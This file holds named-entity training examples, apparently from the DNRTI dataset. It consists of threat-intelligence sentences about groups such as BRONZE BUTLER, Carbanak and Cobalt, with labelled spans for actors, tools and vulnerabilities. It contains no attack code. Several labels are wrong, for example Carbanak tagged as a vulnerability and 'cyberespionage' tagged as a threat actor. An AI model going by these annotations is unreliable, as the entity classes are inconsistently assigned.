{"text": "The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" .", "spans": {"THREAT_ACTOR: hacker group": [[19, 31]], "THREAT_ACTOR: BlackOasis": [[60, 70]]}, "info": {"id": "dnrti_train_000302", "source": "dnrti_train"}}
{"text": "Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: BlackOasis group": [[20, 36]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[54, 95]], "VULNERABILITY: CVE-2016-4117": [[98, 111]], "TOOL: FinSpy": [[158, 164]]}, "info": {"id": "dnrti_train_000303", "source": "dnrti_train"}}
{"text": "Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: group": [[20, 25]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[43, 84]], "VULNERABILITY: CVE-2016-4117": [[87, 100]], "TOOL: FinSpy": [[147, 153]]}, "info": {"id": "dnrti_train_000304", "source": "dnrti_train"}}
{"text": "BlackOasis ' interests span a wide gamut of figures involved in Middle Eastern politics .", "spans": {"THREAT_ACTOR: BlackOasis": [[0, 10]]}, "info": {"id": "dnrti_train_000305", "source": "dnrti_train"}}
{"text": "REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japanese organizations such as government agencies ( including defense ) as well as those in biotechnology , electronics manufacturing , and industrial chemistry .", "spans": {"THREAT_ACTOR: REDBALDKNIGHT": [[0, 13]], "THREAT_ACTOR: BRONZE BUTLER": [[30, 43]], "THREAT_ACTOR: Tick": [[48, 52]], "THREAT_ACTOR: cyberespionage group": [[60, 80]], "ORGANIZATION: government agencies": [[128, 147]]}, "info": {"id": "dnrti_train_000306", "source": "dnrti_train"}}
{"text": "REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japan such as government agencies as well as those in biotechnology , electronics manufacturing , and industrial chemistry .", "spans": {"THREAT_ACTOR: REDBALDKNIGHT": [[0, 13]], "THREAT_ACTOR: BRONZE BUTLER": [[30, 43]], "THREAT_ACTOR: Tick": [[48, 52]], "THREAT_ACTOR: cyberespionage group": [[60, 80]], "ORGANIZATION: government agencies": [[111, 130]]}, "info": {"id": "dnrti_train_000307", "source": "dnrti_train"}}
{"text": "In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets .", "spans": {"THREAT_ACTOR: REDBALDKNIGHT": [[10, 23]], "MALWARE: decoy documents": [[104, 119]]}, "info": {"id": "dnrti_train_000308", "source": "dnrti_train"}}
{"text": "In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 — at least based on the file properties of the decoy documents they've been sending to their targets .", "spans": {"THREAT_ACTOR: REDBALDKNIGHT": [[10, 23]], "MALWARE: decoy documents": [[134, 149]]}, "info": {"id": "dnrti_train_000309", "source": "dnrti_train"}}
{"text": "Secureworks® incident responders and Counter Threat Unit™ ( CTU ) researchers investigated activities associated with the BRONZE BUTLER ( also known as Tick ) threat group , which likely originates in the People .", "spans": {"ORGANIZATION: Secureworks®": [[0, 12]], "ORGANIZATION: CTU": [[60, 63]], "THREAT_ACTOR: BRONZE BUTLER": [[122, 135]], "THREAT_ACTOR: Tick": [[152, 156]], "THREAT_ACTOR: threat group": [[159, 171]]}, "info": {"id": "dnrti_train_000310", "source": "dnrti_train"}}
{"text": "Targeting data supports the belief that APT39 's key mission is to track or monitor targets of interest , collect personal information , including travel itineraries , and gather customer data from telecommunications firms .", "spans": {"THREAT_ACTOR: APT39": [[40, 45]], "ORGANIZATION: telecommunications firms": [[198, 222]]}, "info": {"id": "dnrti_train_000311", "source": "dnrti_train"}}
{"text": "BRONZE BUTLER has used a broad range of publicly available ( Mimikatz and gsecdump ) and proprietary ( Daserf and Datper ) tools .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "TOOL: Mimikatz": [[61, 69]], "TOOL: gsecdump": [[74, 82]], "TOOL: Daserf": [[103, 109]], "TOOL: Datper": [[114, 120]]}, "info": {"id": "dnrti_train_000312", "source": "dnrti_train"}}
{"text": "BRONZE BUTLER are also fluent in Japanese , crafting phishing emails in native Japanese and operating successfully within a Japanese-language environment .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]]}, "info": {"id": "dnrti_train_000313", "source": "dnrti_train"}}
{"text": "BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "VULNERABILITY: zero-day vulnerability": [[69, 91]]}, "info": {"id": "dnrti_train_000314", "source": "dnrti_train"}}
{"text": "The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: zero-day vulnerability": [[65, 87]]}, "info": {"id": "dnrti_train_000315", "source": "dnrti_train"}}
{"text": "BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "TOOL: Daserf malware": [[96, 110]], "VULNERABILITY: Flash exploits": [[136, 150]]}, "info": {"id": "dnrti_train_000316", "source": "dnrti_train"}}
{"text": "The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: Daserf malware": [[92, 106]], "VULNERABILITY: Flash exploits": [[132, 146]]}, "info": {"id": "dnrti_train_000317", "source": "dnrti_train"}}
{"text": "BRONZE BUTLER uses credential theft tools such as Mimikatz and WCE to steal authentication information from the memory of compromised hosts .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "TOOL: Mimikatz": [[50, 58]], "TOOL: WCE": [[63, 66]]}, "info": {"id": "dnrti_train_000318", "source": "dnrti_train"}}
{"text": "While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": {"ORGANIZATION: Secureworks": [[39, 50]], "THREAT_ACTOR: BRONZE BUTLER": [[62, 75]], "VULNERABILITY: CVE-2016-7836": [[142, 155]]}, "info": {"id": "dnrti_train_000319", "source": "dnrti_train"}}
{"text": "While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": {"ORGANIZATION: Secureworks": [[39, 50]], "THREAT_ACTOR: BRONZE BUTLER": [[82, 95]], "VULNERABILITY: CVE-2016-7836": [[162, 175]]}, "info": {"id": "dnrti_train_000320", "source": "dnrti_train"}}
{"text": "Several xxmm samples analyzed by CTU researchers incorporate Mimikatz , allowing BRONZE BUTLER to issue Mimikatz commands directly from xxmm .", "spans": {"ORGANIZATION: CTU": [[33, 36]], "TOOL: Mimikatz": [[61, 69], [104, 112]], "THREAT_ACTOR: BRONZE BUTLER": [[81, 94]]}, "info": {"id": "dnrti_train_000321", "source": "dnrti_train"}}
{"text": "BRONZE BUTLER compromises organizations to conduct cyberespionage , primarily focusing on Japan .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "THREAT_ACTOR: cyberespionage": [[51, 65]]}, "info": {"id": "dnrti_train_000322", "source": "dnrti_train"}}
{"text": "Symantec discovered the most recent wave of Tick attacks in July 2015 , when the group compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: group": [[81, 86]]}, "info": {"id": "dnrti_train_000323", "source": "dnrti_train"}}
{"text": "Symantec discovered the most recent wave of Tick attacks in July 2015 , when BRONZE BUTLER compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: BRONZE BUTLER": [[77, 90]]}, "info": {"id": "dnrti_train_000325", "source": "dnrti_train"}}
{"text": "In some cases , the attackers used the Society for Worldwide Interbank Financial Telecommunication ( SWIFT ) network to transfer money to their accounts .", "spans": {"THREAT_ACTOR: attackers": [[20, 29]], "TOOL: Worldwide Interbank Financial Telecommunication": [[51, 98]], "TOOL: SWIFT": [[101, 106]]}, "info": {"id": "dnrti_train_000326", "source": "dnrti_train"}}
{"text": "Carbanak is a backdoor used by the attackers to compromise the victim .", "spans": {"MALWARE: Carbanak": [[0, 8]], "TOOL: backdoor": [[14, 22]], "THREAT_ACTOR: attackers": [[35, 44]]}, "info": {"id": "dnrti_train_000327", "source": "dnrti_train"}}
{"text": "Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]]}, "info": {"id": "dnrti_train_000330", "source": "dnrti_train"}}
{"text": "Sensitive bank documents have be found on the servers that were controlling Carbanak .", "spans": {"VULNERABILITY: Carbanak": [[76, 84]]}, "info": {"id": "dnrti_train_000331", "source": "dnrti_train"}}
{"text": "Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa .", "spans": {"VULNERABILITY: Carbanak": [[38, 46]], "THREAT_ACTOR: attackers": [[47, 56]]}, "info": {"id": "dnrti_train_000332", "source": "dnrti_train"}}
{"text": "FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015 .", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]], "THREAT_ACTOR: threat group": [[32, 44]]}, "info": {"id": "dnrti_train_000333", "source": "dnrti_train"}}
{"text": "As with previous campaigns , and as highlighted in our annual M-Trends 2017 report , FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process .", "spans": {"ORGANIZATION: M-Trends": [[62, 70]], "THREAT_ACTOR: FIN7": [[85, 89]]}, "info": {"id": "dnrti_train_000334", "source": "dnrti_train"}}
{"text": "While FIN7 has embedded VBE as OLE objects for over a year , they continue to update their script launching mechanisms .", "spans": {"THREAT_ACTOR: FIN7": [[6, 10]], "TOOL: VBE": [[24, 27]]}, "info": {"id": "dnrti_train_000336", "source": "dnrti_train"}}
{"text": "This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies .", "spans": {"VULNERABILITY: Carbanak": [[72, 80]], "ORGANIZATION: payment providers": [[126, 143]], "ORGANIZATION: PR companies": [[166, 178]]}, "info": {"id": "dnrti_train_000337", "source": "dnrti_train"}}
{"text": "The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: consumer": [[77, 85]], "TOOL: Carberp": [[177, 184]]}, "info": {"id": "dnrti_train_000339", "source": "dnrti_train"}}
{"text": "From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space .", "spans": {"VULNERABILITY: Carbanak": [[10, 18]]}, "info": {"id": "dnrti_train_000340", "source": "dnrti_train"}}
{"text": "Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems .", "spans": {"VULNERABILITY: Carbanak": [[11, 19]]}, "info": {"id": "dnrti_train_000341", "source": "dnrti_train"}}
{"text": "The first successful bank robbery was committed by this group in January 2013 .", "spans": {"THREAT_ACTOR: group": [[56, 61]]}, "info": {"id": "dnrti_train_000342", "source": "dnrti_train"}}
{"text": "To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer .", "spans": {"VULNERABILITY: Carbanak": [[71, 79]], "TOOL: Ammy Admin": [[174, 184]], "TOOL: Team Viewer": [[189, 200]]}, "info": {"id": "dnrti_train_000343", "source": "dnrti_train"}}
{"text": "We have no evidence of compromises against banks in Western Europe or United States , but it should be noted that the attackers methods could be utilized against banks outside of Russia as well .", "spans": {"THREAT_ACTOR: attackers": [[118, 127]]}, "info": {"id": "dnrti_train_000344", "source": "dnrti_train"}}
{"text": "Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research .", "spans": {"VULNERABILITY: Carbanak": [[28, 36]]}, "info": {"id": "dnrti_train_000345", "source": "dnrti_train"}}
{"text": "Without any insight into the evidence Kaspersky has obtained , we can only repeat our view that Anunak has targeted only banks in Russia and we have no concrete reports of compromised banks outside of Russia directly related to this criminal group .", "spans": {"ORGANIZATION: Kaspersky": [[38, 47]], "THREAT_ACTOR: Anunak": [[96, 102]], "THREAT_ACTOR: criminal group": [[233, 247]]}, "info": {"id": "dnrti_train_000346", "source": "dnrti_train"}}
{"text": "Charming Kitten is an Iranian cyberespionage group operating since approximately 2014 .", "spans": {"THREAT_ACTOR: Charming Kitten": [[0, 15]], "THREAT_ACTOR: cyberespionage group": [[30, 50]]}, "info": {"id": "dnrti_train_000347", "source": "dnrti_train"}}
{"text": "These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider .", "spans": {"THREAT_ACTOR: criminal groups": [[28, 43]], "THREAT_ACTOR: PoSeidon": [[104, 112]], "VULNERABILITY: Carbanak": [[148, 156]], "THREAT_ACTOR: criminal organization": [[174, 195]], "THREAT_ACTOR: Carbon Spider": [[208, 221]]}, "info": {"id": "dnrti_train_000348", "source": "dnrti_train"}}
{"text": "The Charming Kitten' focus appears to be individuals of interest to Iran in the fields of academic research .", "spans": {"THREAT_ACTOR: Charming Kitten'": [[4, 20]]}, "info": {"id": "dnrti_train_000349", "source": "dnrti_train"}}
{"text": "Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as OilRig and CopyKittens .", "spans": {"THREAT_ACTOR: threat groups": [[212, 225]], "THREAT_ACTOR: OilRig": [[236, 242]], "THREAT_ACTOR: CopyKittens": [[247, 258]]}, "info": {"id": "dnrti_train_000350", "source": "dnrti_train"}}
{"text": "Flying Kitten ( which is another name given by the security industry to Charming Kitten ) was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of the IRI ( Islamic Republic of Iran ) government and foreign espionage targets .", "spans": {"THREAT_ACTOR: Flying Kitten": [[0, 13]], "THREAT_ACTOR: Charming Kitten": [[72, 87]], "THREAT_ACTOR: groups": [[111, 117]], "THREAT_ACTOR: threat actor": [[148, 160]], "THREAT_ACTOR: espionage": [[274, 283]]}, "info": {"id": "dnrti_train_000351", "source": "dnrti_train"}}
{"text": "Flying Kitten was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of government and foreign espionage targets .", "spans": {"THREAT_ACTOR: Flying Kitten": [[0, 13]], "THREAT_ACTOR: groups": [[35, 41]], "THREAT_ACTOR: threat actor": [[72, 84]], "THREAT_ACTOR: espionage": [[161, 170]]}, "info": {"id": "dnrti_train_000352", "source": "dnrti_train"}}
{"text": "At certain times , Mesri has been a member of an Iran-based hacking group called the Turk Black Hat security team \" .", "spans": {"THREAT_ACTOR: hacking group": [[60, 73]], "THREAT_ACTOR: Turk Black Hat": [[85, 99]]}, "info": {"id": "dnrti_train_000353", "source": "dnrti_train"}}
{"text": "During intense intelligence gathering over the last 24 months , we observed the technical capabilities of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort .", "spans": {"THREAT_ACTOR: Operation Cleaver": [[110, 127]]}, "info": {"id": "dnrti_train_000354", "source": "dnrti_train"}}
{"text": "TinyZBot is a bot written in C# and developed by the Cleaver team .", "spans": {"TOOL: TinyZBot": [[0, 8]], "THREAT_ACTOR: Cleaver": [[53, 60]]}, "info": {"id": "dnrti_train_000355", "source": "dnrti_train"}}
{"text": "Some of the teams publicly known today include Iranian Cyber Army , Ashiyane , Islamic Cyber Resistance Group , Izz ad-Din al-Qassam Cyber Fighters , Parastoo , Shabgard , Iran Black Hats and many others 9 .", "spans": {"THREAT_ACTOR: Cyber Army": [[55, 65]], "THREAT_ACTOR: Ashiyane": [[68, 76]], "THREAT_ACTOR: Cyber Resistance Group": [[87, 109]], "THREAT_ACTOR: Izz ad-Din al-Qassam Cyber Fighters": [[112, 147]], "THREAT_ACTOR: Parastoo": [[150, 158]], "THREAT_ACTOR: Shabgard": [[161, 169]], "THREAT_ACTOR: Iran Black Hats": [[172, 187]]}, "info": {"id": "dnrti_train_000356", "source": "dnrti_train"}}
{"text": "However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army ( botnets ) , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team .", "spans": {"THREAT_ACTOR: Cleaver": [[38, 45]], "THREAT_ACTOR: Cyber Army": [[99, 109]], "THREAT_ACTOR: Ashiyane": [[124, 132]]}, "info": {"id": "dnrti_train_000357", "source": "dnrti_train"}}
{"text": "The Cobalt group 's traditional \" stomping grounds \" are the Eastern Europe , Central Asia , and Southeast Asia .", "spans": {"THREAT_ACTOR: Cobalt group": [[4, 16]]}, "info": {"id": "dnrti_train_000358", "source": "dnrti_train"}}
{"text": "Against targets in the CIS countries , the Cobalt also used their own infrastructure , which included rented dedicated servers .", "spans": {"THREAT_ACTOR: Cobalt": [[43, 49]]}, "info": {"id": "dnrti_train_000359", "source": "dnrti_train"}}
{"text": "In several cases , the Cobalt compromised company infrastructure and employee accounts in order to send phishing messages to partner companies in North and South America , Europe , CIS countries , and Central and Southeast Asia .", "spans": {"THREAT_ACTOR: Cobalt": [[23, 29]]}, "info": {"id": "dnrti_train_000360", "source": "dnrti_train"}}
{"text": "To ensure remote access to the workstation of an employee at a target organization , the Cobalt group ( as in previous years ) uses Beacon , a Trojan available as part of commercial penetration testing software .", "spans": {"THREAT_ACTOR: Cobalt group": [[89, 101]], "TOOL: Beacon": [[132, 138]]}, "info": {"id": "dnrti_train_000361", "source": "dnrti_train"}}
{"text": "Artifacts indicated the involvement of the Cobalt that , according to Positive Technologies information , from August to October had performed similar successful attacks in Eastern Europe , and it 's likely that this group may will soon become active in the West .", "spans": {"THREAT_ACTOR: Cobalt": [[43, 49]], "ORGANIZATION: Technologies information": [[79, 103]], "THREAT_ACTOR: group": [[217, 222]]}, "info": {"id": "dnrti_train_000362", "source": "dnrti_train"}}
{"text": "In a recent spear-phishing campaign , the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike .", "spans": {"THREAT_ACTOR: Cobalt Hacking Group": [[42, 62]], "TOOL: Cobalt Strike": [[184, 197]]}, "info": {"id": "dnrti_train_000363", "source": "dnrti_train"}}
{"text": "The basic principles of targeted attacks on financial institutions have not changed since 2013 when the Anunak , Corkow , Buhtrap , and Lurk groups began conducting the first attacks on Russian banks .", "spans": {"ORGANIZATION: financial institutions": [[44, 66]], "THREAT_ACTOR: Anunak": [[104, 110]], "THREAT_ACTOR: Corkow": [[113, 119]], "THREAT_ACTOR: Buhtrap": [[122, 129]], "THREAT_ACTOR: Lurk groups": [[136, 147]]}, "info": {"id": "dnrti_train_000364", "source": "dnrti_train"}}
{"text": "In a recent spear-phishing campaign , the Cobalt Group used a known CVE to connect to its C&C server via Cobalt Strike , but ended up revealing all targets .", "spans": {"THREAT_ACTOR: Cobalt Group": [[42, 54]], "TOOL: Cobalt Strike": [[105, 118]]}, "info": {"id": "dnrti_train_000365", "source": "dnrti_train"}}
{"text": "This isn't the first time we've seen Cobalt makes this error—back in March , an attack focussing on 1,880 targets across financial institutions in Kazakhstan had the same flaw .", "spans": {"THREAT_ACTOR: Cobalt": [[37, 43]], "ORGANIZATION: financial institutions": [[121, 143]]}, "info": {"id": "dnrti_train_000366", "source": "dnrti_train"}}
{"text": "The Carbanak attacks targeting over a 100 financial institutions worldwide .", "spans": {"ORGANIZATION: financial institutions": [[42, 64]]}, "info": {"id": "dnrti_train_000367", "source": "dnrti_train"}}
{"text": "The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police .", "spans": {"THREAT_ACTOR: crime gang": [[18, 28]], "VULNERABILITY: Carbanak": [[40, 48]], "ORGANIZATION: financial institutions": [[97, 119]]}, "info": {"id": "dnrti_train_000368", "source": "dnrti_train"}}
{"text": "Since 2013 , the Cobalt have attempted to attack banks and financial institutions using pieces of malware they designed .", "spans": {"THREAT_ACTOR: Cobalt": [[17, 23]], "ORGANIZATION: financial institutions": [[59, 81]]}, "info": {"id": "dnrti_train_000369", "source": "dnrti_train"}}
{"text": "Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt .", "spans": {"THREAT_ACTOR: cybercrime gang": [[17, 32]], "ORGANIZATION: financial institutions": [[88, 110]], "VULNERABILITY: Carbanak": [[160, 168]], "TOOL: Cobalt": [[173, 179]]}, "info": {"id": "dnrti_train_000370", "source": "dnrti_train"}}
{"text": "The organised crime group started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world .", "spans": {"THREAT_ACTOR: crime group": [[14, 25]], "ORGANIZATION: financial institutions": [[176, 198]]}, "info": {"id": "dnrti_train_000371", "source": "dnrti_train"}}
{"text": "One of the Cobalt Group 's latest campaigns , an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor , was investigated and presented by the Talos research team .", "spans": {"THREAT_ACTOR: Cobalt Group": [[11, 23]], "TOOL: Cobalt": [[72, 78]], "TOOL: Strike beacon": [[79, 92]], "TOOL: JavaScript backdoor": [[100, 119]], "ORGANIZATION: Talos": [[160, 165]]}, "info": {"id": "dnrti_train_000372", "source": "dnrti_train"}}
{"text": "The Cobalt started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world .", "spans": {"THREAT_ACTOR: Cobalt": [[4, 10]], "ORGANIZATION: financial institutions": [[161, 183]]}, "info": {"id": "dnrti_train_000373", "source": "dnrti_train"}}
{"text": "The Cobalt group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia .", "spans": {"THREAT_ACTOR: Cobalt group": [[4, 16]], "TOOL: Cobalt Strike": [[25, 38]], "THREAT_ACTOR: cyber heists": [[74, 86]], "ORGANIZATION: financial institutions": [[98, 120]]}, "info": {"id": "dnrti_train_000374", "source": "dnrti_train"}}
{"text": "The hacking group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia .", "spans": {"THREAT_ACTOR: hacking group": [[4, 17]], "TOOL: Cobalt Strike": [[26, 39]], "THREAT_ACTOR: cyber heists": [[75, 87]], "ORGANIZATION: financial institutions": [[99, 121]]}, "info": {"id": "dnrti_train_000375", "source": "dnrti_train"}}
{"text": "If successful , Cobalt goes on to attack financial institutions outside the country .", "spans": {"THREAT_ACTOR: Cobalt": [[16, 22]], "ORGANIZATION: financial institutions": [[41, 63]]}, "info": {"id": "dnrti_train_000376", "source": "dnrti_train"}}
{"text": "The vulnerability was used to retrieve and execute Cobalt Strike from a remote server they controlled .", "spans": {"TOOL: Cobalt Strike": [[51, 64]]}, "info": {"id": "dnrti_train_000377", "source": "dnrti_train"}}
{"text": "As part of our monitoring of Iranian threat agents activities , we have detected that since October 2016 and until the end of January 2017 , the Jerusalem Post , as well as multiple other Israeli websites and one website in the Palestinian Authority were compromised by Iranian threat agent CopyKittens .", "spans": {"ORGANIZATION: Jerusalem Post": [[145, 159]], "ORGANIZATION: Palestinian Authority": [[228, 249]], "THREAT_ACTOR: CopyKittens": [[291, 302]]}, "info": {"id": "dnrti_train_000378", "source": "dnrti_train"}}
{"text": "CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to date , and are analyzed in this report : TDTESS backdoor ; Vminst , a lateral movement tool ; NetSrv , a Cobalt Strike loader ; and ZPP , a files compression console program .", "spans": {"THREAT_ACTOR: CopyKittens": [[0, 11]], "TOOL: TDTESS backdoor": [[146, 161]], "TOOL: Vminst": [[164, 170]], "TOOL: NetSrv": [[199, 205]], "TOOL: Cobalt Strike loader": [[210, 230]], "TOOL: ZPP": [[237, 240]]}, "info": {"id": "dnrti_train_000379", "source": "dnrti_train"}}
{"text": "CopyKittens often uses the trial version of Cobalt Strike , a publicly available commercial software for \" Adversary Simulations and Red Team Operations \" .", "spans": {"THREAT_ACTOR: CopyKittens": [[0, 11]], "TOOL: Cobalt Strike": [[44, 57]]}, "info": {"id": "dnrti_train_000380", "source": "dnrti_train"}}
{"text": "Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent .", "spans": {"THREAT_ACTOR: CopyKittens": [[31, 42]], "TOOL: Metasploit": [[47, 57]], "TOOL: Mimikatz": [[180, 188]], "TOOL: Empire": [[255, 261]], "TOOL: PowerShell": [[266, 276]]}, "info": {"id": "dnrti_train_000381", "source": "dnrti_train"}}
{"text": "The group , which we have given the name Gallmaker , has been operating since at least December 2017 , with its most recent activity observed in June 2018 .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "THREAT_ACTOR: Gallmaker": [[41, 50]]}, "info": {"id": "dnrti_train_000382", "source": "dnrti_train"}}
{"text": "Rather , the Gallmaker 's attack activity we observed is carried out exclusively using LotL tactics and publicly available hack tools .", "spans": {"THREAT_ACTOR: Gallmaker": [[13, 22]], "TOOL: LotL": [[87, 91]], "TOOL: publicly available hack tools": [[104, 133]]}, "info": {"id": "dnrti_train_000383", "source": "dnrti_train"}}
{"text": "Gallmaker used lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange ( DDE ) protocol in order to gain access to victim machines .", "spans": {"THREAT_ACTOR: Gallmaker": [[0, 9]]}, "info": {"id": "dnrti_train_000384", "source": "dnrti_train"}}
{"text": "Back in 2013 , CopyKittens used several Facebook profiles to spread links to a website impersonating Haaretz news , an Israeli newspaper .", "spans": {"THREAT_ACTOR: CopyKittens": [[15, 26]], "ORGANIZATION: Facebook": [[40, 48]]}, "info": {"id": "dnrti_train_000386", "source": "dnrti_train"}}
{"text": "Gallmaker 's activity appears to be highly targeted , with its victims all related to government , military , or defense sectors .", "spans": {"THREAT_ACTOR: Gallmaker": [[0, 9]], "ORGANIZATION: defense sectors": [[113, 128]]}, "info": {"id": "dnrti_train_000387", "source": "dnrti_train"}}
{"text": "Gallmaker 's targets are embassies of an Eastern European country .", "spans": {"THREAT_ACTOR: Gallmaker": [[0, 9]], "ORGANIZATION: embassies": [[25, 34]]}, "info": {"id": "dnrti_train_000388", "source": "dnrti_train"}}
{"text": "There are no obvious links between the Eastern European and Middle Eastern targets , but it is clear that Gallmaker is specifically targeting the defense , military , and government sectors .", "spans": {"THREAT_ACTOR: Gallmaker": [[106, 115]], "ORGANIZATION: government sectors": [[171, 189]]}, "info": {"id": "dnrti_train_000389", "source": "dnrti_train"}}
{"text": "The group has carried out attacks most months since December 2017 .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_000390", "source": "dnrti_train"}}
{"text": "Its activity subsequently increased in the second quarter of 2018 , with a particular spike in April 2018 .", "spans": {}, "info": {"id": "dnrti_train_000391", "source": "dnrti_train"}}
{"text": "The fact that Gallmaker appears to rely exclusively on LotL tactics and publicly available hack tools makes its activities extremely hard to detect .", "spans": {"THREAT_ACTOR: Gallmaker": [[14, 23]], "TOOL: LotL": [[55, 59]], "TOOL: publicly available hack tools": [[72, 101]]}, "info": {"id": "dnrti_train_000392", "source": "dnrti_train"}}
{"text": "The Gamaredon Group primarily makes use of compromised domains , dynamic DNS providers , Russian and Ukrainian country code top-level domains ( ccTLDs ) , and Russian hosting providers to distribute their custom-built malware .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[4, 19]], "ORGANIZATION: dynamic DNS providers": [[65, 86]], "ORGANIZATION: hosting providers": [[167, 184]], "TOOL: custom-built malware": [[205, 225]]}, "info": {"id": "dnrti_train_000393", "source": "dnrti_train"}}
{"text": "Gallmaker may well have continued to avoid detection were it not for Symantec 's technology .", "spans": {"THREAT_ACTOR: Gallmaker": [[0, 9]], "ORGANIZATION: Symantec": [[69, 77]]}, "info": {"id": "dnrti_train_000394", "source": "dnrti_train"}}
{"text": "In this instance , Symantec identified the specific PowerShell commands used by Gallmaker as being suspicious , leading to the discovery of this new campaign .", "spans": {"ORGANIZATION: Symantec": [[19, 27]], "TOOL: PowerShell commands": [[52, 71]], "THREAT_ACTOR: Gallmaker": [[80, 89]]}, "info": {"id": "dnrti_train_000395", "source": "dnrti_train"}}
{"text": "Without Symantec 's advanced AI-based capabilities , Gallmaker 's activities may well have remained undetected .", "spans": {"ORGANIZATION: Symantec": [[8, 16]], "THREAT_ACTOR: Gallmaker": [[53, 62]]}, "info": {"id": "dnrti_train_000396", "source": "dnrti_train"}}
{"text": "Previously , LookingGlass reported on a campaign they named \" Operation Armageddon \" , targeting individuals involved in the Ukrainian military and national security establishment .", "spans": {"ORGANIZATION: LookingGlass": [[13, 25]]}, "info": {"id": "dnrti_train_000397", "source": "dnrti_train"}}
